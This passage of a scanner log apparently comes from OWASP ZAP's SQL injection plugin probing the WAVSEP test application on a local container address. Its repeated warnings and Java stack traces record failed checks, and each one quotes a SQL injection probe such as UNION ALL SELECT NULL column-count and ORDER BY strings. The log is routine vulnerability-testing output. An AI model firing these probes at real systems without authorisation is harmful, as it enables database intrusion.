failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679351 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679352 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679352 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679353 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 6644-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 6644-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679354 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679355 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679356 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679356 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679358 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679358 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679360 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 